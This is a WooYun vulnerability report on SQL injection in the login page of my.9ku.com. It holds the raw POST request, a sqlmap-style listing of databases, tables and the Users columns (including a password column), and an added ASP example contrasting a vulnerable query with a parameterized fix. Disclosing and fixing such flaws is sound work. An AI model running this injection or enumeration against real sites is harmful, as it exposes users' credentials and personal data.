WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-12-02: Vendor actively contacted; waiting for the vendor to claim the report. Details not disclosed publicly.
2016-01-16: Vendor has chosen to ignore the vulnerability; details disclosed to the public.
http://my.9ku.com/love/ifr_login.asp
POST /love/ifr_login.asp HTTP/1.1
Host: my.9ku.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://my.9ku.com/love/ifr_login.asp
Cookie: ASPSESSIONIDQQRDDTCS=NKJANMLDMNOMKELEILPKHGKI
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

user=admin&pwd=admin&act=login&u=
The user parameter is vulnerable to SQL injection.
available databases [29]:
[*] 51weimo
[*] cc123
[*] cheguanjia
[*] jkalbumrating
[*] jkartist
[*] jkdiyalbum
[*] jkfans
[*] jkfavorite
[*] jkfm
[*] jkmmpic
[*] jkmusichistory
[*] jkmyup
[*] jkpinglun
[*] jkrecommend
[*] jkselfzj
[*] jksms
[*] jksongrating
[*] jktag
[*] jkusers
[*] jkvisitor
[*] master
[*] meinvpic
[*] model
[*] msdb
[*] OpenMusic
Database: jkusers
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| dbo.Users           | 5968982 |
| dbo.View_dates      | 5940632 |
| dbo.view_users      | 5940632 |
| dbo.userEmail       | 2281345 |
| dbo.tempLogin       | 253     |
| dbo.findpass        | 80      |
| dbo.SongsCount      | 18      |
| dbo.gcGongXianTop10 | 10      |
| dbo.T_Config        | 4       |
| dbo.EmailTemplate   | 2       |
+---------------------+---------+

Database: jkusers
Table: Users
[18 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| BirthDay     | datetime |
| City         | nvarchar |
| EMail        | nvarchar |
| email2       | nvarchar |
| fm_tg        | int      |
| fm_ty        | int      |
| fm_xh        | int      |
| IsLock       | tinyint  |
| lrccount     | int      |
| masterphoto  | nvarchar |
| point1_level | int      |
| point2_level | int      |
| Province     | nvarchar |
| RID          | int      |
| RName        | nvarchar |
| RPwd         | nvarchar |
| rthistime    | datetime |
| txtcount     | int      |
+--------------+----------+
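Added example, not from the report and not 9ku's own source (ifr_login.asp is not shown): the classic-ASP login pattern that produces this kind of injection against an MSSQL backend, beside a parameterized ADODB.Command version. The table and column names come from the dump above; the handler structure, the open connection object and the act=login dispatch are assumptions.

```asp
<%
' Hypothetical classic-ASP login handler (added example). Assumes an open
' ADODB.Connection named conn pointing at the jkusers database.
Const adCmdText = 1, adVarWChar = 202, adParamInput = 1

If Request.Form("act") = "login" Then
    Dim userName, userPwd
    userName = Request.Form("user")
    userPwd  = Request.Form("pwd")

    ' VULNERABLE: the user parameter is concatenated straight into the SQL
    ' text, so the content of "user" is parsed as part of the query.
    ' Set rs = conn.Execute("SELECT RID, RName FROM dbo.Users WHERE RName='" _
    '     & userName & "' AND RPwd='" & userPwd & "'")

    ' FIXED: the SQL text is constant and both values are bound as typed
    ' input parameters, so the input can only ever be compared as data.
    Dim cmd, rs
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT RID, RName FROM dbo.Users WHERE RName = ? AND RPwd = ?"
    cmd.Parameters.Append cmd.CreateParameter("@user", adVarWChar, adParamInput, 50, userName)
    cmd.Parameters.Append cmd.CreateParameter("@pwd",  adVarWChar, adParamInput, 50, userPwd)
    Set rs = cmd.Execute

    If rs.EOF Then
        Response.Write "login failed"
    Else
        Session("RID") = rs("RID")
        ' Encode anything echoed back from the database.
        Response.Write "welcome, " & Server.HTMLEncode(rs("RName"))
    End If
    rs.Close
End If
%>
```

Comparing against a stored password hash instead of the raw RPwd value is a separate hardening step the report does not cover.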
Vendor could not be reached, or the vendor actively declined the report.
Vulnerability Rank: 15 (WooYun rating)